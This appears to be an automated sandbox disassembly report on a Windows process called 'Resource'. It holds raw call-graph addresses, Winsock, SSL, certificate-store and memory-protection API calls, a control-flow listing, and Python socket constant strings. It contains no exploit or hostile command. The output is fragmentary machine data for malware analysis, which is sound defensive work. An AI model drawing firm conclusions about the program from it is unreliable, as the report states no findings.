7ff8b7e55791 112352->112354 112353->112351 112356 7ff8b7e546bc 112354->112356 112357 7ff8b7e546f3 112356->112357 112359 7ff8b7e5476b WSAGetLastError 112357->112359 112360 7ff8b7e54763 WSAGetLastError 112357->112360 112361 7ff8b7e5471b 112357->112361 112362 7ff8b7e547d8 WSAGetLastError 112357->112362 112363 7ff8b7e547d0 WSAGetLastError 112357->112363 112364 7ff8b7e547f8 WSAGetLastError 112357->112364 112368 7ff8b7e557e4 112357->112368 112371 7ff8b7e55dbc 112357->112371 112374 7ff8b7e53ba8 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind select 112357->112374 112359->112357 112359->112361 112360->112359 112361->112353 112362->112357 112363->112362 112364->112357 112365 7ff8b7e5480d WSAGetLastError 112364->112365 112365->112357 112365->112361 112369 7ff8b7e557f9 112368->112369 112370 7ff8b7e55806 recv 112368->112370 112369->112370 112370->112357 112372 7ff8b7e55dde send 112371->112372 112373 7ff8b7e55dd1 112371->112373 112372->112357 112373->112372 112374->112357 112375 7ff8a87f0a50 112376 7ff8a87f0a9c 112375->112376 112377 7ff8a87f0aae 00007FF8C6125630 112376->112377 112378 7ff8a87f0ac1 112376->112378 112377->112378 112379 7ff8a87d56a0 new[] 4 API calls 112378->112379 112385 7ff8a87f0b2a 112379->112385 112380 7ff8a87d56a0 new[] 4 API calls 112382 7ff8a87f0e1c 112380->112382 112381 7ff8a88fcad0 4 API calls 112383 7ff8a87f0bef 112381->112383 112393 7ff8a87f0bd2 112382->112393 112395 7ff8a87e8290 112382->112395 112386 7ff8a87d56a0 new[] 4 API calls 112385->112386 112391 7ff8a87f0bc2 112385->112391 112385->112393 112386->112391 112387 7ff8a87f0e77 112389 7ff8a87f0ef8 112387->112389 112392 7ff8a87f0fe7 112387->112392 112394 7ff8a87dc960 11 API calls 112387->112394 112389->112392 112412 7ff8a87e7800 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112389->112412 112391->112380 112391->112392 112391->112393 112392->112393 112413 7ff8a87e79e0 26 API calls 112392->112413 112393->112381 112394->112389 112396 7ff8a87e8321 112395->112396 112397 7ff8a87e8474 112395->112397 112396->112397 112399 7ff8a87e833a 112396->112399 112400 7ff8a87d56a0 new[] 4 API calls 112397->112400 112409 7ff8a87e8355 112397->112409 112398 7ff8a87d56a0 new[] 4 API calls 112401 7ff8a87e83c6 112398->112401 112403 7ff8a87d56a0 new[] 4 API calls 112399->112403 112406 7ff8a87e84ac 112400->112406 112402 7ff8a87e83d2 00007FF8BFAB19C0 112401->112402 112410 7ff8a87e85b3 112401->112410 112404 7ff8a87e843c 112402->112404 112403->112409 112408 7ff8a87e8748 112404->112408 112414 7ff8a87def40 112404->112414 112406->112406 112406->112409 112406->112410 112428 7ff8a8890d40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112406->112428 112408->112410 112429 7ff8a87e7800 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112408->112429 112409->112398 112409->112410 112410->112387 112412->112392 112413->112393 112420 7ff8a87def91 112414->112420 112417 7ff8a88fcad0 4 API calls 112418 7ff8a87df5bf 112417->112418 112418->112408 112419 7ff8a87df160 CreateFileW 112419->112420 112420->112419 112421 7ff8a87df318 112420->112421 112424 7ff8a87df3e5 112420->112424 112430 7ff8a87dbfd0 112420->112430 112436 7ff8a87de980 11 API calls new[] 112420->112436 112437 7ff8a87df7a0 10 API calls 112420->112437 112438 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112420->112438 112421->112417 112439 7ff8a87dc790 9 API calls 112424->112439 112426 7ff8a87df410 112440 7ff8a8890d40 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112426->112440 112428->112409 112429->112410 112431 7ff8a87dc00e 112430->112431 112432 7ff8a87d56a0 new[] 4 API calls 112431->112432 112435 7ff8a87dc057 112431->112435 112433 7ff8a87dc023 112432->112433 112434 7ff8a87dc02b 00007FF8BFAB19C0 112433->112434 112433->112435 112434->112435 112435->112420 112436->112420 112437->112420 112438->112420 112439->112426 112440->112421 112441 7ff8a92effe0 112442 7ff8a92efff0 112441->112442 112443 7ff8a92f0000 112442->112443 112447 7ff8a932ec4c 112442->112447 112451 7ff8a92d14bf 112442->112451 112455 7ff8a92d1e01 112442->112455 112448 7ff8a932ed60 112447->112448 112449 7ff8a932ed9f SetLastError 112448->112449 112450 7ff8a932edb3 112448->112450 112449->112450 112450->112443 112451->112443 112452 7ff8a932e560 112451->112452 112453 7ff8a932ed9f SetLastError 112452->112453 112454 7ff8a932edb3 112452->112454 112453->112454 112454->112443 112455->112443 112456 7ff8a932e680 112455->112456 112457 7ff8a932ed9f SetLastError 112456->112457 112458 7ff8a932edb3 112456->112458 112457->112458 112458->112443 112459 7ff8a92f9060 112460 7ff8a92f907a 112459->112460 112461 7ff8a92f9090 112460->112461 112463 7ff8a92d2054 112460->112463 112463->112461 112464 7ff8a92df820 112463->112464 112465 7ff8a92df83a SetLastError 112464->112465 112466 7ff8a92df85a 112465->112466 112469 7ff8a92d24b9 112466->112469 112467 7ff8a92df87e 112467->112461 112469->112467 112470 7ff8a9318170 112469->112470 112471 7ff8a92d1280 SetLastError 112470->112471 112472 7ff8a93181f6 112470->112472 112473 7ff8a93182f7 112470->112473 112471->112473 112472->112467 112473->112472 112474 7ff8a92d1280 SetLastError 112473->112474 112474->112473 112475 7ff8b7e54864 112476 7ff8b7e5487b 112475->112476 112480 7ff8b7e548b9 112475->112480 112477 7ff8b7e5488e closesocket 112476->112477 112478 7ff8b7e548a5 112477->112478 112479 7ff8b7e548ae 00007FF8C6113440 112478->112479 112478->112480 112479->112480 112481 7ff8a8f29f90 112482 7ff8a8f29fa8 112481->112482 112486 7ff8a8f2ab86 112481->112486 112483 7ff8a8f2aa93 LoadLibraryA 112482->112483 112485 7ff8a8f2aaee VirtualProtect VirtualProtect 112482->112485 112487 7ff8a8f2aaad 112483->112487 112485->112486 112486->112486 112487->112482 112488 7ff8a8f2aacc GetProcAddress 112487->112488 112488->112487 112489 7ff8a8f2aae3 112488->112489 112490 7ff8b7e51060 WSAStartup 112491 7ff8b7e510b0 00007FF8A8AE2E20 112490->112491 112496 7ff8b7e5216b 112490->112496 112492 7ff8b7e510d1 112491->112492 112497 7ff8b7e51159 112491->112497 112493 7ff8b7e510f0 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 112492->112493 112493->112497 112495 7ff8b7e5217d 112501 7ff8b7e52280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 112496->112501 112497->112496 112498 7ff8b7e520cd VerSetConditionMask VerSetConditionMask VerSetConditionMask 112497->112498 112499 7ff8b7e5214a VerifyVersionInfoA 112498->112499 112499->112496 112500 7ff8b7e531a8 112499->112500 112500->112496 112500->112499 112501->112495 112502 7ff8b7e189c8 112504 7ff8b7e189d0 112502->112504 112505 7ff8b7e14028 4 API calls 112504->112505 112506 7ff8b7e18a15 112504->112506 112507 7ff8b7e14720 WSAGetLastError 112504->112507 112505->112504 112507->112504 112508 7ff8b7e55e08 112509 7ff8b7e55e50 112508->112509 112510 7ff8b7e55e54 112509->112510 112511 7ff8b7e546bc 13 API calls 112509->112511 112511->112509 112512 7ff8a92f8350 112513 7ff8a92f836a 112512->112513 112514 7ff8a92f8380 112513->112514 112516 7ff8a92d1131 112513->112516 112516->112514 112517 7ff8a92df3c0 112516->112517 112520 7ff8a92df3f0 112517->112520 112519 7ff8a92df3da 112519->112514 112521 7ff8a92d132a 112520->112521 112522 7ff8a92df410 SetLastError 112521->112522 112523 7ff8a92df430 112522->112523 112526 7ff8a92d1c1c 112523->112526 112524 7ff8a92df46b 112524->112519 112526->112524 112529 7ff8a9316fb0 112526->112529 112528 7ff8a9317079 112528->112524 112529->112528 112530 7ff8a92d1e01 SetLastError 112529->112530 112531 7ff8a932ec4c SetLastError 112529->112531 112532 7ff8a92d14bf SetLastError 112529->112532 112533 7ff8a92d1a0f 112529->112533 112530->112529 112531->112529 112532->112529 112533->112529 112536 7ff8a931aaa0 112533->112536 112534 7ff8a92d14ec SetLastError 112534->112536 112535 7ff8a931b87f 112537 7ff8a931b8aa 00007FF8C6126570 112535->112537 112542 7ff8a931ac23 112535->112542 112536->112534 112536->112535 112536->112542 112538 7ff8a931b8cb 00007FF8C6126570 112537->112538 112537->112542 112539 7ff8a931b8eb 00007FF8C6126570 112538->112539 112538->112542 112540 7ff8a931b902 00007FF8C6126570 112539->112540 112539->112542 112541 7ff8a931b91a 00007FF8C6126570 112540->112541 112540->112542 112541->112542 112542->112529 112543 7ff8b7e548d4 112544 7ff8b7e53588 12 API calls 112543->112544 112548 7ff8b7e54914 112544->112548 112545 7ff8b7e5494e 112564 7ff8b7e52280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 112545->112564 112547 7ff8b7e54970 112548->112545 112550 7ff8b7e53a8c 112548->112550 112551 7ff8b7e58538 112550->112551 112552 7ff8b7e53ab0 connect 112551->112552 112553 7ff8b7e53ace 112552->112553 112554 7ff8b7e53ad6 WSAGetLastError WSAGetLastError 112553->112554 112563 7ff8b7e53b35 112553->112563 112555 7ff8b7e53aef 112554->112555 112556 7ff8b7e53b3c 112555->112556 112557 7ff8b7e53b25 112555->112557 112555->112563 112559 7ff8b7e53b57 112556->112559 112560 7ff8b7e53b70 112556->112560 112558 7ff8b7e53b2a WSASetLastError 112557->112558 112557->112563 112558->112563 112562 7ff8b7e546bc 13 API calls 112559->112562 112561 7ff8b7e546bc 13 API calls 112560->112561 112561->112563 112562->112563 112563->112545 112564->112547 112565 7ff8b7e11350 112567 7ff8b7e1136f 112565->112567 112566 7ff8b7e1143d 112567->112566 112569 7ff8b7e11460 112567->112569 112570 7ff8b7e11486 112569->112570 112571 7ff8b7e13600 112570->112571 112574 7ff8b7e114c8 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind 112570->112574 112573 7ff8b7e114a6 112573->112566 112574->112573 112575 7ff8a9341360 112576 7ff8a9341378 112575->112576 112577 7ff8a9341486 112576->112577 112578 7ff8a92d1c1c 9 API calls 112576->112578 112578->112576 112579 7ff8b7e56650 112584 7ff8b7e566ee 112579->112584 112581 7ff8b7e56967 112592 7ff8b7e52280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 112581->112592 112582 7ff8b7e569ec 112583 7ff8b7e569bf FreeAddrInfoW 112583->112581 112584->112581 112585 7ff8b7e56851 getaddrinfo 112584->112585 112587 7ff8b7e56877 112584->112587 112586 7ff8b7e56873 112585->112586 112586->112587 112588 7ff8b7e56944 112586->112588 112591 7ff8b7e53ea0 9 API calls 112586->112591 112587->112581 112587->112583 112588->112581 112590 7ff8b7e56961 FreeAddrInfoW 112588->112590 112590->112581 112591->112586 112592->112582 112593 7ff8b8af6386 112595 7ff8b8af63f5 112593->112595 112596 7ff8b8af64d3 112595->112596 112597 7ff8b8af6630 112595->112597 112596->112596 112598 7ff8b8af6676 112597->112598 112599 7ff8b8af67d6 00007FF8A89BC8C0 112598->112599 112600 7ff8b8af67fe 112598->112600 112599->112600 112601 7ff8b8af67ea 00007FF8A89BC8C0 112599->112601 112600->112596 112601->112600 112602 7ff8a8797b30 112603 7ff8a87986d1 112602->112603 112610 7ff8a8797b48 112602->112610 112604 7ff8a87985de LoadLibraryA 112605 7ff8a87985f8 112604->112605 112608 7ff8a8798617 GetProcAddress 112605->112608 112605->112610 112607 7ff8a8798639 VirtualProtect VirtualProtect 112607->112603 112608->112605 112609 7ff8a879862e 112608->112609 112610->112604 112610->112607 112611 7ff8a880bf19 112612 7ff8a880bf28 112611->112612 112613 7ff8a87f1fa0 32 API calls 112612->112613 112614 7ff8a880fa1d 112612->112614 112615 7ff8a880c001 112612->112615 112621 7ff8a880bf64 112613->112621 112618 7ff8a880faa9 112614->112618 112625 7ff8a880fb39 112614->112625 112641 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112614->112641 112615->112614 112619 7ff8a880fbe7 112615->112619 112637 7ff8a88097b7 112615->112637 112616 7ff8a8810046 112643 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112616->112643 112618->112616 112642 7ff8a87ffec0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112618->112642 112639 7ff8a87d5ff0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 112619->112639 112621->112614 112621->112615 112638 7ff8a87f35d0 6 API calls 112621->112638 112624 7ff8a8810098 112628 7ff8a88100aa 112624->112628 112644 7ff8a8803490 37 API calls 112624->112644 112626 7ff8a88fcad0 4 API calls 112625->112626 112631 7ff8a880fb70 112625->112631 112630 7ff8a8810159 112626->112630 112627 7ff8a880fc0a 112627->112631 112640 7ff8a882e260 6 API calls 112627->112640 112629 7ff8a88100bb 112628->112629 112645 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112628->112645 112629->112625 112646 7ff8a882e260 6 API calls 112629->112646 112638->112615 112639->112627 112640->112631 112641->112618 112642->112616 112643->112624 112644->112628 112645->112629 112646->112625 112647 7ff8b7e199f8 112648 7ff8b7e19a27 112647->112648 112649 7ff8b7e19a4d 112648->112649 112651 7ff8b7e19aa8 112648->112651 112653 7ff8b7e19ada 112651->112653 112652 7ff8b7e14028 4 API calls 112655 7ff8b7e19b9e 112652->112655 112653->112652 112657 7ff8b7e19afb 112653->112657 112656 7ff8b7e14028 4 API calls 112655->112656 112655->112657 112658 7ff8b7e14720 WSAGetLastError 112655->112658 112656->112655 112657->112649 112658->112655 112659 7ff8a92e7f00 112660 7ff8a92e7f24 112659->112660 112668 7ff8a92e7ff9 112660->112668 112669 7ff8a92e5ca0 112660->112669 112662 7ff8a92e7f75 112663 7ff8a92e8934 00007FF8C6126570 112662->112663 112662->112668 112664 7ff8a92e899a 112663->112664 112665 7ff8a92e897c 112663->112665 112664->112668 112677 7ff8a92e7630 00007FF8C6126570 00007FF8C6126570 00007FF8C6126570 112664->112677 112676 7ff8a92e7630 00007FF8C6126570 00007FF8C6126570 00007FF8C6126570 112665->112676 112670 7ff8a92d132a 112669->112670 112671 7ff8a92e5cba 00007FF8C6126570 112670->112671 112672 7ff8a92e5cf7 00007FF8C6126570 112671->112672 112675 7ff8a92e5ce0 112671->112675 112673 7ff8a92e5d28 00007FF8C6126570 112672->112673 112672->112675 112674 7ff8a92e5d56 00007FF8C6126570 112673->112674 112673->112675 112674->112675 112675->112662 112676->112664 112677->112668 112678 7ff8a87f44f0 112679 7ff8a87f4510 112678->112679 112680 7ff8a87f459c 112679->112680 112681 7ff8a87f45ac 112679->112681 112684 7ff8a87f06a0 112679->112684 112694 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112681->112694 112685 7ff8a87f0722 112684->112685 112686 7ff8a87f06c2 112684->112686 112693 7ff8a87e90d0 26 API calls 112685->112693 112695 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112686->112695 112688 7ff8a87f0783 112690 7ff8a87f06ee 112688->112690 112697 7ff8a8890d00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112688->112697 112689 7ff8a87f0738 112689->112688 112689->112690 112696 7ff8a87f0370 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112689->112696 112690->112679 112693->112689 112694->112680 112695->112690 112696->112688 112697->112690 112698 7ff8b8af12c0 112699 7ff8b8af12ed 112698->112699 112701 7ff8b8af1320 112698->112701 112699->112701 112702 7ff8b8af49e0 112699->112702 112701->112701 112703 7ff8b8af4e11 112702->112703 112704 7ff8b8af4a27 112702->112704 112703->112701 112704->112703 112705 7ff8b8af4a80 00007FF8A89BC8C0 112704->112705 112709 7ff8b8af4a94 112704->112709 112705->112703 112705->112709 112707 7ff8b8af4c27 00007FF8A8806B10 112707->112709 112708 7ff8b8af4f89 00007FF8A8806B10 112708->112709 112709->112703 112709->112707 112709->112708 112710 7ff8b8af6dd0 00007FF8C6126A30 00007FF8C6126A30 00007FF8C6126A30 00007FF8C6126A30 112709->112710 112710->112709 112720 7ff8b7e17f40 112721 7ff8b7e17f6c 112720->112721 112722 7ff8b7e12590 3 API calls 112721->112722 112723 7ff8b7e18027 112722->112723 112733 7ff8b7e1a004 112734 7ff8b7e1a017 112733->112734 112735 7ff8b7e1a076 112734->112735 112737 7ff8b7e1a0e8 00007FF8A8ABF9AC 112734->112737 112738 7ff8b7e1a11c 112737->112738 112747 7ff8b7e1a149 112737->112747 112750 7ff8b7e1c0e0 CertOpenStore 112738->112750 112740 7ff8b7e1a124 112741 7ff8b7e1a20d CertEnumCertificatesInStore 112740->112741 112743 7ff8b7e1a12c 112740->112743 112748 7ff8b7e1b9d8 CertGetEnhancedKeyUsage GetLastError CertGetEnhancedKeyUsage 112740->112748 112749 7ff8b7e1a227 112740->112749 112741->112740 112744 7ff8b7e1a222 112741->112744 112742 7ff8b7e1a13b GetLastError 112742->112747 112743->112742 112743->112747 112745 7ff8b7e1a2e8 CertCloseStore 112744->112745 112745->112743 112745->112747 112746 7ff8b7e1a28e CertFreeCertificateContext 112746->112744 112747->112735 112748->112740 112749->112746 112753 7ff8b7e1c11e 112750->112753 112756 7ff8b7e1c11a 112750->112756 112751 7ff8b7e1c122 CertOpenStore 112752 7ff8b7e1c14d CertAddStoreToCollection 112751->112752 112751->112753 112752->112753 112754 7ff8b7e1c167 CertCloseStore 112752->112754 112753->112751 112753->112754 112755 7ff8b7e1c17c 112753->112755 112754->112753 112755->112756 112757 7ff8b7e1c181 CertCloseStore 112755->112757 112756->112740 112757->112756

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 7ff8b7e51060-7ff8b7e510aa WSAStartup 1 7ff8b7e53108-7ff8b7e53110 0->1 2 7ff8b7e510b0-7ff8b7e510cb 00007FF8A8AE2E20 0->2 5 7ff8b7e53145 1->5 6 7ff8b7e53112-7ff8b7e53115 1->6 3 7ff8b7e51159-7ff8b7e5117f call 7ff8b7e58348 2->3 4 7ff8b7e510d1-7ff8b7e51153 call 7ff8b7e52f5c VerSetConditionMask * 3 VerifyVersionInfoW 2->4 18 7ff8b7e5219e-7ff8b7e521a0 3->18 19 7ff8b7e51185-7ff8b7e511c9 call 7ff8b7e58300 call 7ff8b7e58350 3->19 4->3 8 7ff8b7e5314c-7ff8b7e5315c call 7ff8b7e584d8 5->8 10 7ff8b7e5313c-7ff8b7e53143 6->10 11 7ff8b7e53117-7ff8b7e5311a 6->11 23 7ff8b7e53162-7ff8b7e5316b call 7ff8b7e583a8 8->23 10->8 11->5 15 7ff8b7e5311c-7ff8b7e53136 call 7ff8b7e584a8 11->15 15->10 22 7ff8b7e5216e-7ff8b7e5219d call 7ff8b7e52280 18->22 19->18 31 7ff8b7e511cf-7ff8b7e51209 call 7ff8b7e58300 call 7ff8b7e58350 19->31 23->18 32 7ff8b7e53171 23->32 31->18 40 7ff8b7e5120f-7ff8b7e51262 call 7ff8b7e58300 call 7ff8b7e582f0 call 7ff8b7e58300 31->40 33 7ff8b7e5322a-7ff8b7e53234 call 7ff8b7e58468 32->33 33->18 40->18 47 7ff8b7e51268-7ff8b7e51284 call 7ff8b7e58300 40->47 47->18 50 7ff8b7e5128a-7ff8b7e512b5 call 7ff8b7e58300 call 7ff8b7e583f0 47->50 50->23 55 7ff8b7e512bb-7ff8b7e51304 call 7ff8b7e58380 50->55 58 7ff8b7e5130a-7ff8b7e5131f call 7ff8b7e58300 55->58 59 7ff8b7e53176-7ff8b7e53181 call 7ff8b7e54b80 55->59 65 7ff8b7e5318c-7ff8b7e5318f 58->65 66 7ff8b7e51325-7ff8b7e52034 call 7ff8b7e58568 * 11 call 7ff8b7e584a0 * 2 call 7ff8b7e58568 * 137 58->66 59->18 64 7ff8b7e53187 59->64 64->33 67 7ff8b7e5319a-7ff8b7e5319d 65->67 68 7ff8b7e53191-7ff8b7e53194 call 7ff8b7e58468 65->68 371 7ff8b7e52037-7ff8b7e52042 call 7ff8b7e584b8 66->371 67->18 71 7ff8b7e531a3 67->71 68->67 71->33 371->18 374 7ff8b7e52048-7ff8b7e52064 call 7ff8b7e58300 371->374 374->371 377 7ff8b7e52066-7ff8b7e520c7 call 7ff8b7e58568 * 4 call 7ff8b7e582d8 374->377 388 7ff8b7e520cd-7ff8b7e52147 VerSetConditionMask * 3 377->388 389 7ff8b7e53220-7ff8b7e53224 377->389 390 7ff8b7e5214a-7ff8b7e52165 VerifyVersionInfoA 388->390 389->18 389->33 391 7ff8b7e531a8-7ff8b7e531c6 call 7ff8b7e58418 390->391 392 7ff8b7e5216b 390->392 391->389 395 7ff8b7e531c8-7ff8b7e531e3 call 7ff8b7e58358 391->395 392->22 398 7ff8b7e531ee-7ff8b7e531f1 395->398 399 7ff8b7e531e5-7ff8b7e531e8 call 7ff8b7e58468 395->399 398->389 401 7ff8b7e531f3-7ff8b7e531f8 398->401 399->398 402 7ff8b7e531fa-7ff8b7e531fd call 7ff8b7e58468 401->402 403 7ff8b7e53203-7ff8b7e53215 401->403 402->403 403->390 405 7ff8b7e5321b 403->405 405->389
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConditionMask$InfoVerifyVersion$00007Startup
                                                                                                                                                                                                                                                              • String ID: 00:00:00:00:00:00$00:00:00:FF:FF:FF$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_DROP_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                                                              • API String ID: 1562806975-1299366327
                                                                                                                                                                                                                                                              • Opcode ID: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
                                                                                                                                                                                                                                                              • Instruction ID: a2c1184c7ed5f0069f03642bba85f0eb37b3c30311ae824f10623665c02e0e31
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9A2D2A8B18B8A95EB14DB1AEC5466C2721BF4AFD1F846035CE0E26774DE7DF249C700
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                                              • API String ID: 0-2781224710
